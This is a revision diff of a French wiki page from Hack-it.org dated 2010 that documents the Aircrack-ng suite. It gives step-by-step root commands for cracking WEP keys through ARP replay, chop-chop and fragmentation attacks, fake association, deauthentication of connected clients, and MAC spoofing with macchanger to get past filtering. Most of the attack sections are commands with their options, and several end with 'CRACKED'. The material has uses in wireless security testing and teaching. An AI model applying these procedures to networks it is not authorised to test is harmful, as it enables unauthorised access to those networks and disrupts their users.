Pork Center

Aircrack-ng

De Hack-it.org.

(Aircrack-ng, outils et utilisation)
(buddy-ng)
 
Ligne 2 : Ligne 2 :
=== aircrack-ng ===
=== aircrack-ng ===
-
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.
+
Sert à casser une clé WEP ou WPA, depuis la derniere version, il utilise l'algorythme PTW par défaut pour le cassage du WEP.
=== airbase-ng ===
=== airbase-ng ===
-
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".
+
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap". Peut aussi être utilisé en mode ad hoc, simule un poste client ad hoc.
=== airdecap-ng ===
=== airdecap-ng ===
Ligne 33 : Ligne 33 :
=== airtun-ng ===
=== airtun-ng ===
 +
 +
Permet de dé/chiffrer en WEP des donnés, il peut servir à se connecter en mode monitor, faire une capture en live qui ne prend pas les beacon frame (utile pour une analyse wireshark / tcpdump)
=== buddy-ng ===
=== buddy-ng ===
-
A utiliser avec easside-ng
+
A utiliser avec easside-ng, c'est le serveur auquel se connecte easside-ng
=== easside-ng ===
=== easside-ng ===
Ligne 55 : Ligne 57 :
=== wesside-ng ===
=== wesside-ng ===
Outil permettant l'automatisation du crack de clé WEP.
Outil permettant l'automatisation du crack de clé WEP.
 +
 +
 +
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center>
 +
 +
== Les drivers WiFi ==
 +
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.
 +
* Pour connaitre les drivers supportés:
 +
>>> airdriver-ng supported
 +
 +
* Pour connaitre les drivers déjà installés:
 +
>>> aidriver-ng installed
 +
 +
* Pour connaitre les drivers WiFi chargés dans le kernel:
 +
>>> airdriver-ng loaded
 +
 +
* Pour détecter les cartes WiFi:
 +
>>> airdriver-ng detect
 +
 +
* Pour décharger un driver inutile:
 +
>>> airdriver-ng unload $num_driver
 +
 +
* Pour compiler un driver:
 +
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:
 +
<br />>>> airdriver-ng compile $num_driver
 +
 +
* Pour installer un driver fraichement compilé:
 +
>>> airdriver-ng install $num_driver
 +
 +
* Pour charger un driver dans le kernel:
 +
>>> airdriver-ng load $num_driver
 +
 +
* Pour avoir des détails sur un driver:
 +
>>> airdriver-ng details $num_driver
== Les différents types d'attaques ==
== Les différents types d'attaques ==
-
'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''
+
Dans les cas l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.
-
<br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.
+
=== Légende ===
=== Légende ===
Ligne 70 : Ligne 104 :
=== Mac spoofing ===
=== Mac spoofing ===
-
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type:
+
Pour les procédures ci-dessous, dans les cas l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:
-
<br />>>>macchanger --mac $mac $iface
+
<br />>>> ifconfig $iface down
-
<br />et relancer la carte.
+
<br />>>>macchanger --mac $mac_client $iface
=== Méthode "ARP replay" ===
=== Méthode "ARP replay" ===
-
'''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)'''
+
'''Méthode avec client et sans filtrage MAC'''
* Mettre carte en monitor:
* Mettre carte en monitor:
>>> ifconfig $iface down
>>> ifconfig $iface down
Ligne 102 : Ligne 136 :
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED !!!''
-
=== Methode "chop-chop" et par fragmentation ===
+
=== Methode "chop-chop" et "par fragmentation" ===
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''
* Mettre la carte en monitor:
* Mettre la carte en monitor:
-
>>> ifconfig $iface down
+
>>> ifconfig $iface  
<br />>>> airmon-ng start $iface
<br />>>> airmon-ng start $iface
Ligne 114 : Ligne 149 :
* Lancer la capture d'IVs:
* Lancer la capture d'IVs:
-
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface
+
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface
<br />-w = préfice à utiliser pour le nom du fichier de capture
<br />-w = préfice à utiliser pour le nom du fichier de capture
<br />''Laisser tourner...''
<br />''Laisser tourner...''
Ligne 128 : Ligne 163 :
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-q = intervale entre 2 paquets "keep-alive"
<br />-q = intervale entre 2 paquets "keep-alive"
 +
** En cas de filtrage MAC:
 +
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
 +
<br />-0 = déauthentification
 +
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
 +
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
 +
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
* Attaque:
* Attaque:
Ligne 153 : Ligne 194 :
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED''
=== Méthode "-p 0841" ===
=== Méthode "-p 0841" ===
Ligne 170 : Ligne 212 :
* Associer la carte à la station:
* Associer la carte à la station:
-
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
+
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface
<br />-1 = fake association
<br />-1 = fake association
<br />0 = temps d'attente (en ms) entre 2 tentatives
<br />0 = temps d'attente (en ms) entre 2 tentatives
Ligne 179 : Ligne 221 :
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-o = nombre de jeux de paquets à envoyer à la fois
<br />-q = intervale entre 2 paquets "keep-alive"
<br />-q = intervale entre 2 paquets "keep-alive"
 +
** En cas de filtrage MAC:
 +
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface
 +
<br />-0 = déauthentification
 +
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)
 +
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP
 +
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''
* Lancer l'injection:
* Lancer l'injection:
Ligne 188 : Ligne 236 :
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:
>>> aircrack-ng $fichier_capture
>>> aircrack-ng $fichier_capture
 +
<br />''CRACKED''

Version actuelle en date du 14 novembre 2010 à 21:42